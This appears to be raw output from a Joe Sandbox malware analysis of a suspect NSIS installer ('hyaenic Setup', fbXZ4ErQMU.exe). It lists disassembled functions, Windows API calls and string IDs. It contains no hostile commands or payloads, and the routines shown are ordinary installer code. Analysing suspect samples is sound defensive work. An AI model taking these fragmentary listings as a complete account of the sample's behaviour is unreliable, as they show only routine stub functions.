                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                          • CloseClipboard.USER32 ref: 004056D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: /!s$A$C:\Users\user\tranchet$Call
                                                          • API String ID: 2624150263-228845616
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                          • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                          • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $/!s$M$N
                                                          • API String ID: 2564846305-1697469587
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                          • GetDlgItem.USER32(?,?), ref: 00403D51
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                          • GetSysColor.USER32(?), ref: 004043B4
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                          • lstrlenA.KERNEL32(?), ref: 004043D5
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                          • SendMessageA.USER32(00000000), ref: 0040445E
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                          • SetCursor.USER32(00000000), ref: 004044E1
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                          • SetCursor.USER32(00000000), ref: 004044FA
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: /!s$Call$N
                                                          • API String ID: 3103080414-2891250886
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,hyaenic Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$hyaenic Setup
                                                          • API String ID: 941294808-1687442416
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • *?|<>/":, xrefs: 0040641A
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 0040640E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3900762807
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                          • GetSysColor.USER32(00000000), ref: 0040423D
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                          • SetBkMode.GDI32(?,?), ref: 00404255
                                                          • GetSysColor.USER32(?), ref: 00404268
                                                          • SetBkColor.GDI32(?,?), ref: 00404278
                                                          • DeleteObject.GDI32(?), ref: 00404292
                                                          • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          APIs
                                                            • Part of subcall function 70051215: GlobalAlloc.KERNEL32(00000040,70051233,?,700512CF,-7005404B,700511AB,-000000A0), ref: 7005121D
                                                          • GlobalFree.KERNEL32(?), ref: 700525DE
                                                          • GlobalFree.KERNEL32(00000000), ref: 70052618
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                          • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • MulDiv.KERNEL32(000DAA48,00000064,000DC030), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 70052447
                                                            • Part of subcall function 70051224: lstrcpynA.KERNEL32(00000000,?,700512CF,-7005404B,700511AB,-000000A0), ref: 70051234
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700523C2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700523D7
                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700523E8
                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 700523F6
                                                          • GlobalFree.KERNEL32(00000000), ref: 700523FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 3730416702-0
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32(?), ref: 0040288E
                                                          • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                          • GetClientRect.USER32(?,?), ref: 00401DCC
                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                          • DeleteObject.GDI32(00000000), ref: 00401E20
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3355392842
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-3355392842
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,75A53410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32(0072BA18), ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3355392842
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3370423016
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 7005115B
                                                          • GlobalFree.KERNEL32(00000000), ref: 700511B4
                                                          • GlobalFree.KERNEL32(?), ref: 700511C7
                                                          • GlobalFree.KERNEL32(?), ref: 700511F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
